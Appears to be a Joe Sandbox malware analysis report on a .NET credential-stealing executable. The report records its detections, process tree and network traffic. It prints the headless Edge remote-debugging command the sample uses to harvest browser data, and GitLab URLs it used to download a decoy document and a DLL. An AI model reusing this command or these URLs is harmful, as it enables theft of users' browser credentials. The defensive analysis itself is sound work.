Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hJ1bl8p7dJ.exe

Overview

General Information

Sample name:hJ1bl8p7dJ.exe
renamed because original name is a hash value
Original sample name:ddefa728f5ff2f70fd097609edc4e918afd5fa212115ba2b06f818c1263df23f.exe
Analysis ID:1590664
MD5:73d8502f47e5c7b9b4851ee47692105c
SHA1:98efc25148a119cbe7d9b421d4eff9d784c70dcb
SHA256:ddefa728f5ff2f70fd097609edc4e918afd5fa212115ba2b06f818c1263df23f
Tags:bot7711615259exeuser-JAMESWT_MHT
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Yara detected Telegram Recon
AI detected suspicious sample
Drops password protected ZIP file
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Tries to harvest and steal browser information (history, passwords, etc)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Execution In Headless Mode
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • hJ1bl8p7dJ.exe (PID: 7760 cmdline: "C:\Users\user\Desktop\hJ1bl8p7dJ.exe" MD5: 73D8502F47E5C7B9B4851EE47692105C)
    • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msedge.exe (PID: 7872 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 8068 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1600 --field-trial-handle=1472,i,8808784561077415658,3538669664059517056,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • WINWORD.EXE (PID: 7408 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • msedge.exe (PID: 2880 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9230 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 1884 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1604 --field-trial-handle=1412,i,17015067578929256214,2434644396816959813,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
hJ1bl8p7dJ.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: hJ1bl8p7dJ.exe PID: 7760JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: "C:\Users\user\Desktop\hJ1bl8p7dJ.exe", ParentImage: C:\Users\user\Desktop\hJ1bl8p7dJ.exe, ParentProcessId: 7760, ParentProcessName: hJ1bl8p7dJ.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-w
      Sigma detected: Browser Execution In Headless Mode
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: "C:\Users\user\Desktop\hJ1bl8p7dJ.exe", ParentImage: C:\Users\user\Desktop\hJ1bl8p7dJ.exe, ParentProcessId: 7760, ParentProcessName: hJ1bl8p7dJ.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-w
      Sigma detected: Browser Started with Remote Debugging
      Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: "C:\Users\user\Desktop\hJ1bl8p7dJ.exe", ParentImage: C:\Users\user\Desktop\hJ1bl8p7dJ.exe, ParentProcessId: 7760, ParentProcessName: hJ1bl8p7dJ.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-w

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-14T13:12:21.301042+010028033053Unknown Traffic192.168.2.1149722172.65.251.78443TCP
      2025-01-14T13:13:11.587466+010028033053Unknown Traffic192.168.2.1150003172.65.251.78443TCP
      2025-01-14T13:13:14.172851+010028033053Unknown Traffic192.168.2.1150005104.26.12.205443TCP
      2025-01-14T13:13:14.781271+010028033053Unknown Traffic192.168.2.1150006104.26.12.205443TCP
      2025-01-14T13:13:15.302916+010028033053Unknown Traffic192.168.2.1150007208.95.112.180TCP
      2025-01-14T13:13:15.973074+010028033053Unknown Traffic192.168.2.1150008104.26.12.205443TCP
      2025-01-14T13:13:16.568106+010028033053Unknown Traffic192.168.2.1150009104.26.12.205443TCP
      2025-01-14T13:13:17.044295+010028033053Unknown Traffic192.168.2.1150010208.95.112.180TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.7% probability
      Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.11:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.11:50005 version: TLS 1.2
      Source: hJ1bl8p7dJ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256r source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdbSHA256kX source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdbSHA256 source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256@ source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: System.Diagnostics.Process.ni.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdbSHA256 source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\Projects\HK_NAVITE_DLL_v3_OKE\HK\bin\Release\net8.0\win-x64\native\oke.pdb source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: hJ1bl8p7dJ.exe
      Source: Binary string: D:\a\cb\cb\cb\bld\bin\e_sqlite3\win\v142\plain\x64\e_sqlite3.pdb source: hJ1bl8p7dJ.exe, 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1901160535.000002107E400000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.dr
      Source: Binary string: System.IO.Compression.ni.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdbSHA256 source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: hJ1bl8p7dJ.exe
      Source: global trafficHTTP traffic detected: GET /app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false HTTP/1.1Host: gitlab.com
      Source: global trafficHTTP traffic detected: GET /hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=false HTTP/1.1Host: gitlab.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownDNS query: name: ip-api.com
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50007 -> 208.95.112.1:80
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50010 -> 208.95.112.1:80
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49722 -> 172.65.251.78:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50003 -> 172.65.251.78:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50006 -> 104.26.12.205:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50005 -> 104.26.12.205:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50008 -> 104.26.12.205:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50009 -> 104.26.12.205:443
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false HTTP/1.1Host: gitlab.com
      Source: global trafficHTTP traffic detected: GET /hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=false HTTP/1.1Host: gitlab.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
      Source: global trafficDNS traffic detected: DNS query: gitlab.com
      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
      Source: global trafficDNS traffic detected: DNS query: ip-api.com
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E11D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org:443/p
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
